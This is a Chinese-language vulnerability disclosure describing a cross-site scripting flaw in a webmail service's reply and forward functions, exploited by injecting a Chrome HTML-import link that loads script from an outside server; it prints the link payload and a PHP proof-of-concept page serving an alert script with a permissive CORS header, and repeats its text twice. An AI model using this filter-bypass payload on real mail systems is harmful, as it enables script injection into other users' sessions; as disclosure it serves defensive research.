### 简要描述:
回复转发触发
### 详细说明:
chrome进入36时代以后,多了一种引入外部HTML的方法:
<link rel=import href=http://xxx/xxx.html>
twitter上MK很早就通过这个方法bypass了当时的chrome audit:https://twitter.com/avlidienbrunn/status/486059626002395136,但实际上这个方法的危害不止于此,大部分基于黑名单的富文本过滤器是没有考虑这个方式的XSS的,通过这个就能简单构造一个XSS。
首先准备一个外部HTML:http://mhz.pw/game/SOP/01.php
```
<?php
header("Access-Control-Allow-Origin: *");
?>
<script>
alert(location.host);
</script>
```
设置"Access-Control-Allow-Origin: *"头才能够被跨域请求。
点击回复时:
[<img src="https://images.seebug.org/upload/201501/19161607c7fa6231e13db562c60dd143ec4f95d0.jpg" alt="x.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/19161607c7fa6231e13db562c60dd143ec4f95d0.jpg)
转发邮件:
[<img src="https://images.seebug.org/upload/201501/19161704759a296854f2254e2c1e8b83b4c8e52a.jpg" alt="x.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/19161704759a296854f2254e2c1e8b83b4c8e52a.jpg)
### 漏洞证明:
chrome进入36时代以后,多了一种引入外部HTML的方法:
<link rel=import href=http://xxx/xxx.html>
twitter上MK很早就通过这个方法bypass了当时的chrome audit:https://twitter.com/avlidienbrunn/status/486059626002395136,但实际上这个方法的危害不止于此,大部分基于黑名单的富文本过滤器是没有考虑这个方式的XSS的,通过这个就能简单构造一个XSS。
首先准备一个外部HTML:http://mhz.pw/game/SOP/01.php
```
<?php
header("Access-Control-Allow-Origin: *");
?>
<script>
alert(location.host);
</script>
```
设置"Access-Control-Allow-Origin: *"头才能够被跨域请求。
点击回复时:
[<img src="https://images.seebug.org/upload/201501/19161607c7fa6231e13db562c60dd143ec4f95d0.jpg" alt="x.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/19161607c7fa6231e13db562c60dd143ec4f95d0.jpg)
转发邮件:
[<img src="https://images.seebug.org/upload/201501/19161704759a296854f2254e2c1e8b83b4c8e52a.jpg" alt="x.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/19161704759a296854f2254e2c1e8b83b4c8e52a.jpg)
京公网安备 11010502034610号
暂无评论